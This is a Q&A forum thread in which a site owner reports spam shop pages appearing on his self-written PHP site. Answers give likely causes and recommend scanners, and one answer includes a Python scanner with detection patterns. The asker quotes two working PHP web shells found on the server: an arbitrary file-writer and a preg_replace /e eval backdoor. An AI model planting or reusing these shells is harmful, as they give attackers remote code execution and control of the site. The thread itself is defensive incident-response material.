PHP
Uzair Izha, 2016-04-01 01:24:36

Site hacked: how do I work out why this happens?

I made a website, and from time to time more than 500 HTML files belonging to some kind of Chinese online store appear in the root of the site. What could this be connected with? What kind of security flaws does this produce? The site is self-written; there is nothing special about it apart from articles. The files appear to be uploaded to the server. The HTML files look like 001_shop_eKxk.html
There are also unfamiliar folders, in which I found this PHP file:

<?php
//header("Content-Type: text/html; charset=utf-8");
$config_password="yt";
$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$folderpath=$_REQUEST['folderpath'];
$filename=$_REQUEST['filename'];
$body=stripslashes($_REQUEST['body']);

if($password==""||$filename==""||$body=="")
{
    echo 'parameters error!';
    return;
}

if($password!=$config_password)
{
    echo 'password error!';
    return;
}

$rootPath=$_SERVER['DOCUMENT_ROOT'];
$newPath=$rootPath;

if($folderpath!="")
{
  if($folderpath=="root")
  {
    $newPath=$rootPath.'/'.$filename;
  }
  else
  {
    createFolder($rootPath.'/'.$folderpath);
    $newPath=$rootPath.'/'.$folderpath.'/'.$filename;
  }
}
else
{
  $newPath=$filename;
}


$fp=fopen($newPath,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,$body);
fclose($fp);

if(file_exists($newPath))
{
    echo "publish success & uploaded";
}

function createFolder($path) 
{
    if (!file_exists($path))
    {
        createFolder(dirname($path));
        mkdir($path, 0777);
    }
}
?>

Or here's another:
<?php  preg_replace("/laterain/e", "ev"."al('".$_REQUEST['yt']."')", "laterain testin9"); ?>


6 answer(s)
Andrzej Wielski, 2016-04-01
@wielski

https://yandex.ru/promo/manul#about
Use it, check the site for shells and other evil spirits.

Archakov Dennis, 2016-04-01
@archakov06

There is a wonderful utility, aiBolit. I advise scanning the site (the website folder) with it.
1. Perhaps your FTP account was hacked.
2. The shell was uploaded through some kind of plugin.
3. A site located on the same server as your site was hacked.
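As an added example (not code from any answer here, nor from the asker's site or from aiBolit), a small Python scanner that walks a web root and flags the indicators visible in the two files in the question: the preg_replace /e trick, eval() fed from a request parameter, a request-controlled fopen() in write mode, mkdir with 0777, and the 001_shop_*.html naming. The fixtures it scans are constructed inline; the regexes are heuristics, so every hit needs a manual look.

```python
import re
import tempfile
from pathlib import Path

# Indicator regexes derived from the two files in the question. They are
# heuristics and will flag some legitimate code, so review every hit by hand.
SUPERGLOBAL = r"\$_(?:REQUEST|GET|POST|COOKIE)"
INDICATORS = [
    # preg_replace with the /e modifier ("/" delimiter assumed): replacement runs as PHP
    ("preg_replace /e", re.compile(r"preg_replace\s*\(\s*[\"']/[^\"']*/[a-z]*e[a-z]*[\"']")),
    # eval() with request input somewhere in the same statement
    ("eval of request input", re.compile(r"\beval\s*\([^;]*" + SUPERGLOBAL + r"\b")),
    # fopen() in write mode inside a file that also reads request parameters
    ("request-driven file write",
     re.compile(r"(?s)\A(?=.*" + SUPERGLOBAL + r"\s*\[).*?fopen\s*\([^;]*,\s*[\"']w[\"']\s*\)")),
    # world-writable directory creation, as in the shell's createFolder()
    ("mkdir 0777", re.compile(r"mkdir\s*\([^;]*,\s*0777\s*\)")),
]
SPAM_NAME = re.compile(r"^\d{3}_shop_\w+\.html$")  # the 001_shop_eKxk.html naming

def scan_source(text):
    """Return the names of the indicators found in one PHP source string."""
    flat = text.replace('"."', "").replace("'.'", "")  # undo the "ev"."al(" split
    return [name for name, rx in INDICATORS if rx.search(flat)]

def scan_tree(root):
    """Return {relative posix path: [indicator names]} for suspicious files under root."""
    findings = {}
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        hits = ["spam page filename"] if SPAM_NAME.match(path.name) else []
        if path.suffix == ".php":
            hits += scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def build_demo_root():
    """Create a constructed web root: one clean file plus three planted ones."""
    root = tempfile.mkdtemp()
    samples = {  # constructed fixtures, not files from the asker's server
        "index.php": '<?php $log = fopen("/tmp/app.log", "a"); fwrite($log, "ok"); ?>',
        "001_shop_eKxk.html": "<html>spam</html>",
        "images/cache.php": '''<?php preg_replace("/x/e", "ev"."al('".$_REQUEST['c']."')", "x"); ?>''',
        "tmp/publish.php": '''<?php mkdir($_REQUEST['d'], 0777); $fp = fopen($_REQUEST['f'], "w"); ?>''',
    }
    for rel, body in samples.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body, encoding="utf-8")
    return root
```

Point scan_tree() at the real document root instead of build_demo_root() to run it on a live site; the clean index.php fixture shows that an ordinary fopen in append mode without request input is not reported.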

index0h, 2016-04-01
@index0h

With what it can be connected?

You have been hacked.
Question from the series: "What did I do wrong?".
These can be:
* Access based on popular usernames/passwords
* Stealing the admin password via XSS
* Weakly secure FTP/SFTP
* SQL injections
* Uploaded files have the right to execute
* Uploaded files can be included in the main code
* CMS site with enabled debug mode
* there have been cases of hacking "from the inside", when the hacker is a colleague
* perhaps the hoster was actually hacked, and you were just unlucky
* open ports of trusted services stick out outside: mysql, memcached, redis,...
* ...
Look at the logs; they may be useful.

Chvalov, 2016-04-01
@Chvalov

Perhaps they are getting in through a neighboring site. Are you on shared hosting or your own VPS/VDS?

trevoga_su, 2016-04-01
@trevoga_su

$config_password="......"; 
// where .... is md5() of some complex password, so that it can't be found in md5 lookup tables

if(md5($password) != $config_password)
{ // ....

At the least.

MrGroovy, 2020-12-03
@MrGroovy

You have been hacked and your site is most likely being used for fraud.
You need to remove all third-party files from the site, ideally it is better to restore it from a backup. Change all passwords and scan files, just in case, for malware.

With what it can be connected? What kind of security flaws does this produce?

Most likely, you configured some of the site components incorrectly. There are many options, here are the main ones:
  • File permission misconfiguration (Security Misconfiguration)
  • Database access vulnerabilities (SQL Injection)
  • Weak passwords (Brute Force)
  • Cross Site Scripting (XSS)

You should not rule out the possibility of an exploit due to outdated software versions (ssh, ftp) yet.
You need to understand that changing passwords and deleting third-party files is a temporary measure. You will keep getting hacked until you close the security holes in the site. I would recommend using a general-purpose scanner that checks the site in all directions at once. Online options include METASCAN and Acunetix.
And I also advise you to read the PHP security manual https://www.php.net/manual/en/security.php
